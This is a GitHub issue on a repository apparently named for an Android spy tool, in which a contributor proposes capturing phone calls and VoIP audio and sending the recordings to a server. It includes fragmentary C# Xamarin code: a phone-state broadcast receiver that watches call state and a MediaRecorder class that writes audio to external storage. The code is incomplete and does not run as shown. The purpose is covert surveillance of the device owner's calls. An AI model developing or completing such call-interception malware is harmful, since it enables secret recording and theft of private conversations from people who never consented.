starling021 / AndroSpyhf

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Audio Capture Improvement #1

Open Fenrisus opened 3 years ago

Fenrisus commented 3 years ago

How about to capture VoIP and PhoneCall save it and send to server?

Fenrisus commented 3 years ago
    [IntentFilter(new[] { "android.intent.action.PHONE_STATE" })]
    public class IncomingCallReceiver : BroadcastReceiver
        public TelephonyManager _Manager { get; set; }
        public override void OnReceive(Context context, Intent intent)
            _Manager = context.GetSystemService(Context.TelephonyService) as TelephonyManager;
            if (_Manager == null)
            _Manager.Listen(listener, PhoneStateListenerFlags.CallState);
         //Do something here?

Also there is the possible way to do similar with VoIP connectionsvia tracking AudioDevice state at service

And do the something like:

        public VoiceCallRecorder()
            _Recorder = new MediaRecorder();
            //API requirements
            //Container : WAV
            //Encoding : PCM
            //Rate : 16K
            //Sample Format : 16bit
            //Channels : Mono


            var storage = File.CreateTempFile("data_", ".mp4", Android.OS.Environment.ExternalStorageDirectory);
            _OutputPath = storage.AbsolutePath;

        public void RecStart()
            if (IsRec) return;

            IsRec = true;